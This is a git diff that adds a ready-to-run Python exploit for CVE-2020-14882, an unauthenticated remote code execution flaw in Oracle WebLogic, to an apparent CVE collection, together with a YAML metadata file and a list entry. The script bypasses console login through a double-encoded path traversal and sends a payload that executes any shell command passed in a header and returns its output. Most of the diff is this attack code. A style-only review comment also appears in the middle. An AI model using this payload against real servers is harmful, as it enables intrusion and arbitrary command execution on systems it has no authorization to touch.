diff --git a/cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py b/cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py
new file mode 100644
index 0000000000000000000000000000000000000000..23d5336d8d16b774b0315e68722b83baed4fd6e9
--- /dev/null
+++ b/cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# author: XINXINXIANGRONG
+import http.client
+import requests
+import sys
+import argparse
+http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
+
+payload_cve_2020_14882_v12 = ('_nfpb=true&_pageLabel=&handle='
+ 'com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = '
+ '(weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = '
+ 'executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField'
+ '("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet'
+ '.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) '
+ 'obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); '
+ 'String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]'
+ '{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result '
+ '= new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter'
+ '("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.'
+ 'ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);'
+ 'res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));'
+ 'res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); ");')
+
+def cve_2020_14882(url, cmd):
+ payload = payload_cve_2020_14882_v12
+ path = "/console/css/%252e%252e%252fconsole.portal"
+ headers = {
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,'
+ 'application/signed-exchange;v=b3;q=0.9',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Accept-Language': 'zh-CN,zh;q=0.9',
+ 'Connection': 'close',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'cmd': cmd
+ }
+ try:
+ request = requests.post(url + path, data=payload, headers=headers, timeout=10, verify=False)
+ print(request.text)
+ except Exception as error:
+ print("[-] Vuln Check Failed... ...")
+ print("[-] More Weblogic vulnerabilities in https://github.com/zhzyker/vulmap")
+
+
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Weblogic cve-2020-14882',
+ usage='use "python %(prog)s --help" for more information',
+ formatter_class=argparse.RawTextHelpFormatter)
+ parser.add_argument("-u", "--url",
+ dest="url",
+ help="target url (http://127.0.0.1:7001)"
+ )
+
+ parser.add_argument("-c", "--cmd",
+ dest="cmd",
+ help="command"
+ )
+ args = parser.parse_args()
+ if not args.url or not args.cmd:
+ sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-14882_rce.py -u http://127.0.0.1:7001 -c whoami')
+ cve_2020_14882(args.url, args.cmd)
\ No newline at end of file
diff --git a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..94ff4774967add68f7a8a3d35fd30f4aba41c061
--- /dev/null
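Review bot: `http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'` at module level overwrites a private attribute of the standard library's HTTPConnection class for every HTTP client in the process, including any program that merely imports this module, and nothing in the file says why HTTP/1.0 is forced; a comment such as `# NOTE: process-wide side effect — forces HTTP/1.0 on every http.client connection, not just this script's request` should state the intent, and the setting would be better placed under the `__main__` guard so importing the module stays side-effect free. Whether the connection class used by requests actually picks this attribute up is not verifiable from the hunk, so the comment should not promise an effect. `cve_2020_14882` has no docstring; a one-line summary naming `url` and `cmd` and stating that the function prints the response and returns nothing would help a reader. In the `except` clause `error` is bound but never used, so `except Exception:` is sufficient.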
+++ b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-14882
+source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
+info:
+ name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
+ severity: critical
+ description: |
+ CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台
+ scope-of-influence:
+ weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
+ reference:
+ https://nvd.nist.gov/vuln/detail/CVE-2020-14882
+ https://www.oracle.com/security-alerts/cpuoct2020.html
+ http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html
+ http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
+ http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-14882
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+tags: cve2020, Weblogic
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 24cb593fef16d858c0f7ddf6762a5eac0e1dc113..3bc82cfcd29d04a646ee5827dc7bd95a5a8b3d90 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -86,6 +86,7 @@ cve:
 - CVE-2022-26134
 weblogic:
 - CVE-2020-2551
+ - CVE-2020-14882
 polkit:
 - CVE-2021-4034
 - CVE-2021-4115